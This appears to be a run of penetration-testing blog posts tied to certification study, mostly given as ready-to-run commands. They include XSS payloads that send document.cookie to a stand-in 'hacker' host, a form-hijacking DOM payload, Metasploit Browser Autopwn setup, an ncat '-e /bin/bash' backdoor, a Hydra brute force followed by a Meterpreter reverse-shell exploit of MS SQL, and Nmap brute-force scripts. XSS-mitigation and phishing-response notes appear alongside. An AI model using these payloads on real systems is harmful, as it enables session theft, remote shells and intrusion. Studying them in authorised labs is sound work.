Sunday, August 23, 2020

[XSS]Two key test cases against Cross Site Scripting

Stealing Cookie:

"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>

<script>var i = new Image();i.src="http://hacker/log.php?q="+document.cookie;</script>


Work with Browser Autopwn:

<IFRAME src='http://hacker'><\/IFRAME>


For more information, refer to my project at "https://github.com/d3m0n4l3x/alexfuzz".

Friday, August 21, 2020

[eCPPT][XSS][metasploit][Browser][Autopwn]Verify Browser Security through Metasploit

1) Enter the Metasploit console (msfconsole):

# msfconsole


2) Select Browser Autopwn:

msf5 > use auxiliary/server/browser_autopwn

OR

msf5 > use auxiliary/server/browser_autopwn2


3) Configure the module options:

msf5 auxiliary(server/browser_autopwn) > set LHOST 192.168.0.XX /*P.S.: 192.168.0.XX is the IP address of this machine.*/

msf5 auxiliary(server/browser_autopwn) > set SRVPORT 80

msf5 auxiliary(server/browser_autopwn) > set URIPATH /


4) Start the malicious web server:

msf5 auxiliary(server/browser_autopwn) > exploit


5) Metasploit then shows a "Local IP" URL, which the machine under test should browse, as shown below:

[*] --- Done, found 20 exploit modules

[*] Using URL: http://0.0.0.0:80/

[*] Local IP: http://192.168.0.XX:80/ /*P.S.: http://192.168.0.XX:80/ is the URL needed to be browsed by the tested machine.*/

[*] Server started.


6) If the tested machine is vulnerable, a Meterpreter session should appear shortly.

Wednesday, August 19, 2020

[eCPPT][XSS]Test Cases for DOM-based Cross Site Scripting

Here are some test cases for DOM-based Cross Site Scripting:

"><img src="aaa" onerror="alert(document.cookie)">

"><svg/onload="alert(document.cookie)">

"><svg/onload="document.forms[0].action='//192.168.0.253/get.php'">

Tuesday, August 18, 2020

[Phishing]Detect and Respond to Phishing Emails

Detection:

- Use threat intelligence to confirm whether it is a phishing email.

- Phone the sender to confirm whether it is a phishing email.


Response:

- Report to the Federal Trade Commission at spam@uce.gov.

- Report to the financial institution being impersonated.

- Update the detection and mitigation rules on the email security system.

Monday, August 17, 2020

[eCPPT][XSS]Mitigation of Cross Site Scripting risk

1) Set the flags below on the cookie:

expires=

domain=

path=

secure

HttpOnly

2) Store only a session ID / token in the cookie rather than other meaningful values.

3) Set up a whitelist mechanism to validate user input.

4) Use encoding functions such as HtmlEncode to neutralize dangerous characters (e.g. "<" and ">").

TIPS: AntiXSS libraries can be used to mitigate the risk of Cross Site Scripting with little effort.
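The four measures above put together in one place, as an added example that is not code from the original post: a whitelist check on input, HtmlEncode-style output encoding, and a Set-Cookie header that carries only an opaque session id with expires, domain, path, secure and HttpOnly set. The cookie name, domain and sample values are assumptions.

```python
import re
from datetime import datetime, timezone
from html import escape
from http.cookies import SimpleCookie

# Item 3: a whitelist for a field; anything that does not match is rejected before use.
USERNAME_ALLOWLIST = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def is_allowed_username(value: str) -> bool:
    """True only when the input consists of the characters the application expects."""
    return USERNAME_ALLOWLIST.fullmatch(value) is not None


# Item 4: HtmlEncode-style output encoding for data echoed back into a page.
def html_encode(untrusted: str) -> str:
    """Encode &, <, >, " and ' so the text can neither open a tag nor close an attribute."""
    return escape(untrusted, quote=True)


def render_greeting(name: str) -> str:
    """A template fragment that echoes a user-controlled value after encoding it."""
    return "<p>Welcome, " + html_encode(name) + "</p>"


# Items 1 and 2: the cookie holds only an opaque session id, and every listed flag is set.
def session_cookie_header(session_id: str, domain: str, expires_utc: datetime) -> str:
    """Build the Set-Cookie value with expires, domain, path, secure and HttpOnly."""
    cookie = SimpleCookie()
    cookie["SESSIONID"] = session_id          # cookie name is an assumption
    morsel = cookie["SESSIONID"]
    morsel["expires"] = expires_utc.strftime("%a, %d %b %Y %H:%M:%S GMT")
    morsel["domain"] = domain
    morsel["path"] = "/"
    morsel["secure"] = True     # sent over HTTPS only
    morsel["httponly"] = True   # not readable via document.cookie, so the probes above get nothing
    return morsel.OutputString()


# Constructed sample values so the block runs stand-alone (not from the original post).
EXAMPLE_HEADER = session_cookie_header(
    "3f9c1b7e2a4d", "example.com", datetime(2020, 8, 17, tzinfo=timezone.utc)
)

if __name__ == "__main__":
    probe = '"><svg/onload="alert(document.cookie)">'
    print("whitelist accepts probe:", is_allowed_username(probe))   # False
    print(render_greeting(probe))                                     # rendered as harmless text
    print("Set-Cookie:", EXAMPLE_HEADER)
```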

Sunday, August 16, 2020

[Netcat][Ncat][Nmap][eCPPT]netcat cheat sheet

Reference: https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf


This cheat sheet is based on the rewritten version of Netcat, namely ncat, which is part of Nmap.


Port Scan:

# ncat -z -w1 -n -v 192.168.0.251 22


Socket Client:

# ncat -nvv 192.168.0.251 443


Socket Server:

# ncat -vv -l -p 443


Keep-alive Socket Server (keeps listening after a client disconnects):

In Windows:

cmd > nc -L -p 443

In Linux/Unix:

# ncat -k -l -p 443


Restricting which clients may connect:

Only allow 192.168.0.253 to connect to the socket:

ncat --allow 192.168.0.253 -vv -l -p 443

Deny only 192.168.0.251 from connecting to the socket:

ncat --deny 192.168.0.251 -vv -l -p 443


Backdoor Server:

# ncat -l -p 888 -e /bin/bash


File Transfer:

Recipient / Server:

# ncat -l -p 8888 > /tmp/test.txt

Sender / Client:

# ncat -w3 -n 192.168.0.253 8888 < ./test.txt


Saturday, August 15, 2020

[Netcat]Keep Netcat sockets alive to continuously listen

The examples below demonstrate how to create Netcat sockets that keep listening, in Windows and Linux/Unix respectively.


In Windows:

cmd > nc -vv -L -p 443


In Linux/Unix:

# ncat -vv -k -l -p 443

Friday, August 7, 2020

[ICSI_CPT]A walkthrough of Pentest against MS SQL Server

First, confirm whether MS SQL Server is listening on its default port.

# nmap -Pn -sS -p 1433 192.168.0.25


After that, try to ascertain the details of the MS SQL Server.

# nmap -v -p 1433 --script=ms-sql-info 192.168.0.25


Once the details of the authentication mode are known, Hydra can be used to brute-force the password.

# hydra -s 1433 -l sa -P /usr/share/wordlists/sqlmap.txt


Through Metasploit, let us complete the final step of the exploitation.

# msfconsole

msf > use exploit/windows/mssql/mssql_payload

msf > set payload windows/meterpreter/reverse_tcp

msf > set LHOST XXX.XXX.XXX.XXX

msf > set RHOST XXX.XXX.XXX.XXX

msf > set USERNAME sa

msf > set PASSWORD XXXXX

msf > run

Thursday, August 6, 2020

[eCPPT]Identify Web Application Framework

1) Through HTTP Header
e.g. "X-Content-Encoded-By: Joomla! 2.5"

2) Through Web Content
e.g. "Copyright 2015 vBulletin Solutions."

3) Through HTML Tags
e.g. "<meta name="generator" content="WordPress 4.2-beta3-31946" />"

4) Through URL
e.g. "index.php?option=%component_name%&task=%task_value%"
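An added example, not part of the original post, that checks one HTTP response against the four disclosure sources listed above; run over your own application's responses it reports which version-revealing headers, tags and URL patterns still need removing. The sample headers, body and URL are constructed, and the regexes are assumptions sized to those strings.

```python
import re
from typing import Dict, List, Tuple

# Checks mirroring the four sources in the post; each regex captures the evidence it finds.
HEADER_NAMES = ["x-content-encoded-by"]
BODY_CHECKS = [
    ("meta generator tag", re.compile(r'<meta\s+name="generator"\s+content="([^"]*)"', re.I)),
    ("copyright notice", re.compile(r"Copyright\s+\d{4}\s+([^.<]+)", re.I)),
]
URL_CHECK = ("url pattern", re.compile(r"index\.php\?option=([^&]+)&task=([^&\s]+)"))

Finding = Tuple[str, str]


def find_framework_leaks(headers: Dict[str, str], body: str, url: str) -> List[Finding]:
    """Return (source, evidence) for each place the response reveals its framework or version."""
    findings: List[Finding] = []
    lowered = {name.lower(): value for name, value in headers.items()}   # header names are case-insensitive
    for name in HEADER_NAMES:
        if name in lowered:
            findings.append(("http header", f"{name}: {lowered[name]}"))
    for label, pattern in BODY_CHECKS:
        for match in pattern.finditer(body):
            findings.append((label, match.group(1).strip()))
    match = URL_CHECK[1].search(url)
    if match:
        findings.append((URL_CHECK[0], f"option={match.group(1)} task={match.group(2)}"))
    return findings


# Constructed sample response that deliberately leaks through all four channels (not a real server's output).
SAMPLE_HEADERS = {"Content-Type": "text/html", "X-Content-Encoded-By": "Joomla! 2.5"}
SAMPLE_BODY = (
    '<html><head><meta name="generator" content="WordPress 4.2-beta3-31946" /></head>'
    "<body><footer>Copyright 2015 vBulletin Solutions.</footer></body></html>"
)
SAMPLE_URL = "http://127.0.0.1/index.php?option=com_example&task=view"

if __name__ == "__main__":
    for source, evidence in find_framework_leaks(SAMPLE_HEADERS, SAMPLE_BODY, SAMPLE_URL):
        print(f"{source:20} {evidence}")
```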

Monday, August 3, 2020

[ICSI_CPT]Mirror Website

#!/usr/bin/perl
use strict;
use warnings;
use Cwd;
$| = 1;    # unbuffered STDOUT so the prompt appears before <STDIN> blocks

# Abort unless the required external tool is on PATH.
sub check_tool {
        my ($tool, $name) = @_;
        my $result = `which $tool`;
        chomp($result);
        die "Please install $name.\n" if length($result) == 0;
        return;
}

sub check_wget { check_tool('wget', 'Wget'); }
sub check_tree { check_tool('tree', 'Tree'); }

#main() function:
check_wget();
check_tree();
print("URL(e.g. \"https://192.168.0.22:5001/\" OR \"http://www.microsoft.com/\"): ");
my $url = <STDIN>;
chomp($url);
my ($protocol, $server);
# e.g. https://192.168.0.22:5001/ -> protocol "https", server "192.168.0.22:5001"
if($url=~/^([a-z]+):\/\/([^\/]+)\//i){
        $protocol = $1;
        $server = $2;
}else{
        die "The format of $url is problematic!\nThe correct format should be like \"https://192.168.0.22:5001/\" OR \"http://www.microsoft.com/\".\n";
}
# --protocol-directories mirrors into ./<protocol>/<server>/ under the current directory
system("wget --protocol-directories -r '$url' > /dev/null 2>&1");
my $current_path = getcwd();
my $path = $current_path."/".$protocol."/".$server."/";
print("$url has been downloaded at $path.\n");
my $structure_file = $current_path."/".$protocol."_".$server."_structure.txt";
system("tree '$path' > '$structure_file'");
print("The STRUCTURE file has been generated at $structure_file.\n");

[ICSI_CPT][Spider]Crawl a website structure via wget

Suppose the target is http://192.168.0.253:5001/, you can mirror the website by executing the following command:
# wget --protocol-directories -r http://192.168.0.253:5001/

The command below displays the directory structure of the mirrored website:
# tree ./http/192.168.0.253:5001/

The following command finds mirrored pages containing a keyword, "password" in this example:
# grep -nR password ./http/192.168.0.253:5001/

Saturday, August 1, 2020

[ICSI_CPT][Brute Force]Multiple Brute Force attacks performed by Nmap

Suppose the target is 192.168.0.10 in this case:
# nmap -Pn -T4 -F -sT -sU --script ftp-anon,ftp-brute,telnet-brute,ssh-brute,rexec-brute,smtp-brute,smb-brute,snmp-brute 192.168.0.10

[ICSI_CPT]Testing the Finger service for User Enumeration on Unix-like systems

Suppose the target is 192.168.0.10:
# finger @192.168.0.10
# finger '1 2 3 4 5 6 7 8 9 0'@192.168.0.10
# finger 0@192.168.0.10
# finger .@192.168.0.10
# finger **@192.168.0.10
# finger user@192.168.0.10
# finger test@192.168.0.10